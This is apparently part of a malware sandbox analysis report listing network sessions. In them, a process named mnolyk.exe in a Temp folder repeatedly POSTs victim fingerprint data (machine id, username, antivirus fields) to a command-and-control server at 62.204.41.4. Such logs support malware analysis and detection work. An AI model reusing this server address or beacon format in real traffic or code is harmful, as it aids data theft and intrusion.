                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:40.770910978 CET | 688 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    489 | 192.168.2.3 | 50192 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:40.958822966 CET | 689 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:41.021773100 CET | 689 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    49 | 192.168.2.3 | 49751 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:28.918585062 CET | 250 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:28.981673002 CET | 250 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    490 | 192.168.2.3 | 50193 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:41.207055092 CET | 690 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:41.273262978 CET | 690 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    491 | 192.168.2.3 | 50194 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:41.460819006 CET | 690 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:41.522612095 CET | 691 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    492 | 192.168.2.3 | 50195 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:41.704353094 CET | 692 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:41.769680977 CET | 692 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    493 | 192.168.2.3 | 50196 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:41.941741943 CET | 693 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:42.006381035 CET | 693 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    494 | 192.168.2.3 | 50197 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:42.188563108 CET | 694 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:42.254254103 CET | 694 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    495 | 192.168.2.3 | 50198 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:42.429543972 CET | 695 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:42.494379997 CET | 695 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    496 | 192.168.2.3 | 50199 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:33:42.673837900 CET | 696 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:42.738421917 CET | 696 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    51192.168.2.34975362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:29.389091969 CET252OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:29.453413963 CET252INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    510192.168.2.35021362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:46.112683058 CET710OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:46.178411007 CET710INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    511192.168.2.35021462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:46.359244108 CET711OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:46.424200058 CET711INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    512192.168.2.35021562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:46.606174946 CET712OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:46.670124054 CET712INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    513192.168.2.35021662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:46.862529039 CET713OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:46.927639008 CET713INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    514192.168.2.35021762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:47.101357937 CET714OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:47.167072058 CET714INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    515192.168.2.35021862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:47.347487926 CET715OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:47.412645102 CET715INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    516192.168.2.35021962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:47.609047890 CET716OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:47.675343037 CET716INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    517192.168.2.35022062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:47.855829000 CET717OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:47.920484066 CET717INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    518192.168.2.35022162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:48.092669010 CET718OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:48.156487942 CET718INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
